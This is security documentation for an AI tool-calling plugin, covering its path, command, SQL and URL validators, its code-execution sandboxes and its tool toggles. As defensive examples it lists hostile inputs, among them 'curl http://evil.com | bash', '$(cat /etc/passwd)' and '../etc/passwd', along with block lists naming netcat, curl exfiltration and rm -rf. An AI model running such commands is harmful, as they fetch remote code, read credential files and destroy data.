Comprehensive documentation of security features, threat models, and responsible disclosure for the AI Toolbox plugin.
The AI Toolbox plugin implements defense-in-depth security across all tool categories. Every tool that interacts with the file system, network, or executes code passes through multiple validation layers.
### Path validation (`validatePath`)

Purpose: Prevent directory traversal attacks and unauthorized file access.

Implementation: see the `validatePath` signature at the end of this document.
Protection Layers:

| Layer | Check | Result |
|---|---|---|
| Empty Input | `!basePath \|\| !userPath` | Reject |
| UNC Paths | `userPath.startsWith('\\\\')` | Reject |
| Traversal Patterns | `userPath.includes('../')`, `userPath.includes('..\\\\')` | Reject |

Security Model (v1.4.2+): The function performs pattern-based validation only, checking for dangerous path traversal sequences. This approach:

- Blocks traversal sequences (`../`, `..\`, mixed separators)
- Blocks UNC paths (`\\server\share`)

Examples: see the `validatePath` examples at the end of this document.
Note: The simplified pattern-based approach (v1.4.2) ensures reliable security without requiring resolved paths to exist in allowed filesystem bases, making it suitable for both production use and unit testing with fake paths.
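The three layers from the table as a runnable check, added here as an example and not the plugin's own code. It returns `true` for an acceptable path, and adds one assumption that goes beyond the page: a segment-wise check that also catches a bare trailing `..` such as `foo/..`, which has no trailing separator and would slip past the substring checks.

```typescript
// Added example (not the plugin's own code): pattern-based validatePath
// following the Protection Layers table. The segment-wise check at the end
// is an assumption beyond the page; it also rejects a bare ".." segment.
function validatePath(userPath: string, basePath: string): boolean {
  // Layer: empty input
  if (!basePath || !userPath) return false;
  // Layer: UNC paths (\\server\share) are rejected outright
  if (userPath.startsWith('\\\\')) return false;
  // Layer: traversal sequences with either separator, including mixed ones
  if (userPath.includes('../') || userPath.includes('..\\')) return false;
  // Extra: split on both separators and reject any ".." segment
  const segments = userPath.split(/[\\/]+/);
  if (segments.includes('..')) return false;
  return true;
}

// Constructed sample paths (relative to a base) with the expected verdicts
const SAMPLE_PATHS: Array<[string, boolean]> = [
  ['src/index.ts', true],
  ['subdir/file.txt', true],
  ['../etc/passwd', false],
  ['..\\windows\\system32', false],
  ['valid/../../../escape', false],
  ['\\\\network\\share', false],
  ['foo/..', false],
];

// Returns the sample paths whose verdict differs from the expectation
function checkSamples(basePath: string): string[] {
  return SAMPLE_PATHS
    .filter(([p, expected]) => validatePath(p, basePath) !== expected)
    .map(([p]) => p);
}
```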
### Binary file detection (`isBinaryFile`)

Purpose: Prevent processing of binary files as text (memory safety, encoding issues).

Implementation: Checks the first 8KB for null bytes (`\0`); see the function at the end of this document.
### Command sanitization (`sanitizeCommand`)

Purpose: Prevent shell injection and dangerous command execution while enforcing tool-category toggles.

2-Layer Architecture:

| Layer | Function | Purpose |
|---|---|---|
| Layer 1 | Dangerous Pattern Blocking | Blocks rm -rf, sudo, injection, etc. |
| Layer 2 (S6) | Tool-Category Enforcement | Classifies commands and blocks them if the category is disabled in config |

Layer 2 Implementation (`classifyCommand`):

Detects tool categories in the command string and checks against config toggles:

| Category | Detection Patterns |
|---|---|
| webSearch | duckduckgo, google, bing |
| browserAutomation | puppeteer, playwright, chromium |
| databaseQueries | sqlite3, mysql, psql |
| httpClient | curl, wget, http |
| backgroundCommands | nohup, disown, `&` |
| gitOperations | git *, api.github.com |

Blocked Patterns (Layer 1):

| Category | Patterns |
|---|---|
| File Destruction | rm -rf, shred, wipe |
| Privilege Escalation | sudo, su |
| Network Attacks | nc/netcat, wget --post-file, curl --data-binary |
| Data Exfiltration | base64 \| curl, scp, sftp |
| Process Manipulation | fork, exec |
| Environment Tampering | export, eval, IFS manipulation |
| Injection | $(), backticks, null bytes |
| Command Chaining | >2 pipes, >1 semicolons |

Examples: see the `sanitizeCommand` examples at the end of this document.
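Both layers wired together, added here as an example and not the plugin's own code: Layer 1 rejects a command on a dangerous pattern or on chaining, then Layer 2 classifies the command and rejects it if any detected category is disabled in the toggles. The regexes are illustrative assumptions that cover the rows of the two tables above, not the plugin's real patterns.

```typescript
// Added example (not the plugin's own code): a two-layer sanitizer following
// the tables above. The regexes are illustrative assumptions, not the plugin's.
type Category = 'webSearch' | 'browserAutomation' | 'databaseQueries'
  | 'httpClient' | 'backgroundCommands' | 'gitOperations';
type Toggles = Record<Category, boolean>;
interface Verdict { allowed: boolean; reason?: string }

// Layer 1: dangerous patterns (a subset of the Blocked Patterns table)
const DANGEROUS: Array<[RegExp, string]> = [
  [/\brm\s+-\w*(rf|fr)\b/i, 'file destruction'],
  [/\b(sudo|su)\b/, 'privilege escalation'],
  [/\b(nc|netcat)\b|wget\s+--post-file|curl\s+--data-binary/, 'network attack'],
  [/base64\s*\|\s*curl|\b(scp|sftp)\b/, 'data exfiltration'],
  [/\b(export|eval)\b|\bIFS=/, 'environment tampering'],
  [/\$\(|`|\0/, 'injection'],
];

// Layer 2: category detection (Detection Patterns table)
const CATEGORY_PATTERNS: Array<[Category, RegExp]> = [
  ['webSearch', /duckduckgo|google|bing/i],
  ['browserAutomation', /puppeteer|playwright|chromium/i],
  ['databaseQueries', /\b(sqlite3|mysql|psql)\b/],
  ['httpClient', /\b(curl|wget)\b|https?:/],
  ['backgroundCommands', /\b(nohup|disown)\b|&\s*$/],
  ['gitOperations', /^\s*git\b|api\.github\.com/],
];

// Every category whose detection pattern matches the command string
function classifyCommand(cmd: string): Category[] {
  return CATEGORY_PATTERNS.filter(([, re]) => re.test(cmd)).map(([c]) => c);
}

function sanitizeCommand(cmd: string, toggles: Toggles): Verdict {
  for (const [re, why] of DANGEROUS) {
    if (re.test(cmd)) return { allowed: false, reason: `blocked: ${why}` };
  }
  // Command chaining: more than 2 pipes or more than 1 semicolon
  const pipes = (cmd.match(/\|/g) || []).length;
  const semis = (cmd.match(/;/g) || []).length;
  if (pipes > 2 || semis > 1) return { allowed: false, reason: 'blocked: command chaining' };
  // Layer 2: every detected category must be enabled in the config
  for (const cat of classifyCommand(cmd)) {
    if (!toggles[cat]) return { allowed: false, reason: `category disabled: ${cat}` };
  }
  return { allowed: true };
}
```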
⚠️ Shell Interpretation Note: The `execute_command` tool now uses Node.js's `shell: true` option to support full shell features (pipes, redirects, environment variables). Security is maintained through `sanitizeCommand()`, which validates and blocks dangerous patterns before the command reaches the shell. This approach matches industry best practices for secure shell execution while maintaining flexibility.

### SQL query validation (`validateSQLQuery`)

Purpose: Ensure database queries are read-only.
Allowed Operations:

- SELECT statements
- PRAGMA statements

Blocked Keywords:

DROP, DELETE, UPDATE, INSERT, ALTER, CREATE, REPLACE, TRUNCATE, GRANT, REVOKE
Additional Checks:
### URL validation (`validateUrl`)

Purpose: Prevent Server-Side Request Forgery attacks.

Blocked Protocols:

- `file:` → Local file access
- `data:` → Data URI injection

Blocked Hostnames:

| Pattern | Range |
|---|---|
| 127.* | localhost |
| 10.* | 10.0.0.0/8 |
| 172.16-31.* | 172.16.0.0/12 |
| 192.168.* | 192.168.0.0/16 |
| 0.0.0.0 | All interfaces |
| localhost | localhost hostname |

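The protocol and hostname rules above as a runnable SSRF guard, added here as an example and not the plugin's own code. The 172.16-31.* row is matched as a real /12 prefix test on the parsed address rather than as a string prefix. Two assumptions go beyond the page: only http(s) is accepted after the two blocked protocols are rejected, and the IPv6 loopback `::1` is treated like localhost.

```typescript
// Added example (not the plugin's own code): SSRF guard following the Blocked
// Protocols and Blocked Hostnames tables. The http(s)-only rule and the ::1
// check are assumptions beyond the page.
interface UrlVerdict { ok: boolean; reason?: string }

// Dotted-quad IPv4 to an unsigned 32-bit number; null for anything else
function ipv4ToInt(host: string): number | null {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return null;
  const p = m.slice(1).map(Number);
  if (p.some((n) => n > 255)) return null;
  return ((p[0] << 24) | (p[1] << 16) | (p[2] << 8) | p[3]) >>> 0;
}

// [network, prefix length] for each row of the Blocked Hostnames table
const BLOCKED_RANGES: Array<[string, number]> = [
  ['127.0.0.0', 8], ['10.0.0.0', 8], ['172.16.0.0', 12],
  ['192.168.0.0', 16], ['0.0.0.0', 32],
];

function inRange(ip: number, net: string, bits: number): boolean {
  const mask = (0xffffffff << (32 - bits)) >>> 0;
  return ((ip & mask) >>> 0) === ((ipv4ToInt(net)! & mask) >>> 0);
}

function validateUrl(raw: string): UrlVerdict {
  let url: URL;
  try { url = new URL(raw); } catch { return { ok: false, reason: 'malformed URL' }; }
  if (url.protocol === 'file:') return { ok: false, reason: 'file: local file access' };
  if (url.protocol === 'data:') return { ok: false, reason: 'data: URI injection' };
  if (url.protocol !== 'http:' && url.protocol !== 'https:') {
    return { ok: false, reason: `unsupported protocol ${url.protocol}` };
  }
  // WHATWG URL keeps IPv6 literals in brackets; strip them for comparison
  const host = url.hostname.replace(/^\[|\]$/g, '');
  if (host === 'localhost' || host === '::1') return { ok: false, reason: 'localhost' };
  const ip = ipv4ToInt(host);
  if (ip !== null && BLOCKED_RANGES.some(([net, bits]) => inRange(ip, net, bits))) {
    return { ok: false, reason: 'private or loopback address' };
  }
  return { ok: true };
}
```

Because the WHATWG `URL` parser canonicalizes the hostname before the check runs, shorthand IPv4 spellings are compared as their dotted-quad equivalents.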
### JavaScript execution (`run_javascript`)

Blocked Patterns: see the list at the end of this document.

### Python execution (`run_python`)

Blocked Imports: see the list at the end of this document.

### ReDoS protection (`isSafeRegex`)

Purpose: Prevent Regular Expression Denial of Service attacks.

Detected Patterns:

| Pattern | Example |
|---|---|
| Nested quantifiers | (.*)(.*) |
| Repetition of repetition | (.+)+ |
| Alternation + repetition | (a|b)+ |
| Char class + repetition | ([a-z]+)+ |
| Double star | (.*?)** |

Length Limit: Maximum 500 characters (configurable).

Tool categories and their defaults:

| Category | Default | Risk Level | Reason |
|---|---|---|---|
| File System | ✅ Enabled | Low | Path validation applied |
| Web Search | ✅ Enabled | Low | Read-only network access |
| Browser Automation | ❌ Disabled | Medium | Full browser access |
| Git Operations | ❌ Disabled | Medium | Repository modification |
| Database Queries | ❌ Disabled | Low | Read-only, but requires Node 23+ |
| Document Parsing | ✅ Enabled | Low | Read-only file access |
| Background Commands | ❌ Disabled | High | Arbitrary command execution |
| Image Processing | ✅ Enabled | Low | Read-only image access |
| HTTP Client | ❌ Disabled | Medium | Network access to any URL |
| Vector RAG | ✅ Enabled | Low | Read-only file indexing |
| Interactive UI Generation | ❌ Disabled | Low | HTML generation only, no execution |
| Auto-Context Management | ✅ Enabled | Low | Local JSON storage, read/write |
| JavaScript Execution | ❌ Disabled | ⚠️ High | Code execution |
| Python Execution | ❌ Disabled | ⚠️ High | Code execution |
| Terminal Execution | ❌ Disabled | ⚠️ High | Shell access |
| Shell Commands | ❌ Disabled | ⚠️ High | |

JavaScript and Python sandboxes use regex pattern matching, which can potentially be bypassed with obfuscation techniques. Do not enable execution tools for untrusted LLM outputs.
The command sanitizer blocks known dangerous patterns but cannot guarantee protection against all injection techniques. Complex command chains may slip through.
Windows path normalization can be complex. The implementation handles common cases but edge cases with symbolic links or junctions may exist.
The query_database tool requires Node.js 23+ for the built-in node:sqlite module. On older versions, the tool returns an error.
For contributors adding new tools: see the validation checklist at the end of this document, which lists the validator each kind of tool must call.
If you discover a security vulnerability:

| Phase | Timeline |
|---|---|
| Acknowledgment | Within 48 hours |
| Initial Assessment | Within 1 week |
| Patch Development | Within 2 weeks |
| Public Disclosure | After patch is available |

Always review file modifications and command outputs before proceeding.
Set a specific working directory to limit the scope of file operations:
Regularly check and cancel long-running background commands:
Regularly update the plugin to get the latest security patches.
ContextGuard is a read-only context management system that does not:
Security Properties:
`countTokens`:

- Uses the `@dqbd/tiktoken` library (no network calls)

Security Properties:

`compressHistory`:

- `contextGuardSummaryModel` allows dedicated summarization model selection

Security Properties:

`smartRead`:

- Uses `validatePath()` for file access control
- Uses `.includes()` (no RegEx)
- `maxLength` parameter

Security Properties:

`filterTerminalOutput`:

- `contextGuardTerminalFilterLength` sets truncation point

All ContextGuard settings are client-side only and do not:

| Setting | Validation | Risk Level |
|---|---|---|
| contextGuardEnabled | Boolean toggle | None |
| contextGuardTokenLimit | Number (1K-200K) | None (memory usage only) |
| contextGuardSmartReading | Boolean toggle | None |
| contextGuardSummaryModel | String (model name) | Low (uses LM Studio's model validation) |
| contextGuardTerminalFilterEnabled | Boolean toggle | None |
| contextGuardTerminalFilterLength | Number (100-20K) | None (output size only) |

| Threat | Description | Mitigation |
|---|---|---|
| Memory Exhaustion | Large token limit causes high memory usage | Configurable limit with reasonable defaults (80K tokens) |
| Denial of Service | Repeated compression triggers slow down system | Hash-based caching prevents redundant computation |
| Prompt Injection via Summary | Malicious content in summary affects future responses | Summaries are read-only; no execution context |
| Model Selection Attack | Malicious model name causes unexpected behavior | LM Studio validates model names before loading |

As of v1.4.1, ContextGuard has:

| Setting | Default | Rationale |
|---|---|---|
| contextGuardEnabled | true | Enabled by default; users can disable if not needed |
| contextGuardTokenLimit | 80,000 | Balances context retention with memory usage |
| contextGuardSmartReading | true | Saves tokens without security implications |
| contextGuardSummaryModel | "" (current chat model) | Uses existing validated model selection |
| contextGuardTerminalFilterEnabled | true | Prevents context bloat from verbose outputs |
| contextGuardTerminalFilterLength | 2,000 | Reasonable limit for terminal output visibility |

ContextGuard operations are logged to console (not persisted):
Note: Logs do not include message content (only metadata like counts and lengths).
End of Security Documentation
Status: ✅ Patched: upgraded from glob@10.3.10 → glob@13.0.6
Description: The glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names.
Affected Versions: >=10.3.7 <10.5.0 and >=11.0.0 <11.1.0
CVSS Score: High
Exploit Maturity: Proof-of-concept available
Remediation Applied:
References:
Status: ✅ Resolved: upgraded from uuid@8.x → uuid@11.0.4
Description: Older versions of uuid use Math.random() which is cryptographically weak and deprecated.
Remediation Applied:
Note: For CommonJS projects, uuid@11 is recommended. Future migration to ESM + uuid@14.x planned before 2028.
## Appendix: code and examples referenced above

Validation checklist for contributors adding new tools:

- `validatePath()` used for file operations
- `sanitizeCommand()` used for shell commands
- `validateSQLQuery()` used for database queries
- `validateUrl()` used for HTTP requests

`validatePath` signature:

```typescript
function validatePath(userPath: string, basePath: string): boolean
```

`validatePath` examples:

```text
✅ "src/index.ts"           → Safe relative path
✅ "subdir/file.txt"        → Safe nested path
❌ "../etc/passwd"          → Directory traversal detected
❌ "..\\windows\system32"   → Windows-style traversal
❌ "valid/../../../escape"  → Mixed traversal
❌ "\\\\network\share"      → UNC path rejected
```
`isBinaryFile` implementation:

```typescript
// Treat the file as binary if a null byte appears in its first 8 KB
function isBinaryFile(content: string): boolean {
  const chunk = content.slice(0, 8192);
  return chunk.includes('\0');
}
```
`sanitizeCommand` examples:

```text
✅ "ls -la"                       → Safe
✅ "git status"                   → Safe
❌ "rm -rf /"                     → File destruction
❌ "sudo apt install ..."         → Privilege escalation
❌ "curl http://evil.com | bash"  → Command chaining
❌ "$(cat /etc/passwd)"           → Command substitution
```
`run_javascript` blocked patterns:

```text
require()            // Module loading
eval()               // Dynamic code execution
fs.*                 // File system access
child_process.*      // Process spawning
Function()           // Constructor bypass
String.fromCharCode  // Obfuscation bypass
import()             // Dynamic imports
.__proto__           // Prototype pollution
.constructor         // Constructor access
require.resolve      // Path resolution bypass
```
`run_python` blocked imports:

```text
import os                 # OS operations
from os import *          # OS operations
import subprocess         # Process spawning
from subprocess import *  # Process spawning
import shutil             # File operations
__import__()              # Dynamic imports
eval()                    # Dynamic execution
exec()                    # Dynamic execution
os.system()               # Shell commands
os.popen()                # Shell commands
```
Tool permission model (God Mode vs. individual toggles):

```text
God Mode (ON)
│
├── Bypasses ALL individual toggles
└── Every tool is enabled

God Mode (OFF)
│
├── Individual category toggles checked
│   ├── fileSystem: true → 17 tools enabled
│   ├── webSearch: true → 4 tools enabled
│   ├── browserAutomation: false → 0 tools enabled
│   └── ... (all categories)
│
└── Execution tools checked individually
    ├── executionJavaScript: false
    ├── executionPython: false
    ├── executionTerminal: false
    └── executionShell: false
```

Recommendations:

- ✅ Enable only the tools you need
- ❌ Don't use God Mode unless necessary
- ❌ Never enable execution tools for untrusted prompts
Setting a working directory (`change_directory`) and checking a background command (`check_background_command`):

```text
Tool: change_directory
Params: { "directory": "C:\\Projects\\safe-workspace" }

Tool: check_background_command
Params: { "id": "cmd_123" }
```
ContextGuard API:

```typescript
async countTokens(messages: any[]): Promise<number>
async compressHistory(messages: any[]): Promise<any[]>
smartRead(filePath: string, userPrompt?: string): string
filterTerminalOutput(output: string): string
```
ContextGuard console log messages:

```text
[ContextGuard] Token count (${currentTokens}) below threshold (${threshold}). No compression needed.
[ContextGuard] Compressing history: ${messages.length} messages, ${currentTokens} tokens
[ContextGuard] Summarization complete. Generated ${summary.length} chars.
[ContextGuard] Using fallback summary for ${toCompress.length} messages
```
Dependency overrides applied in package.json (glob and uuid remediation):

```json
"overrides": {
  "glob": "^13.0.6"
}
```

```json
"overrides": {
  "uuid": "^11.0.4"
}
```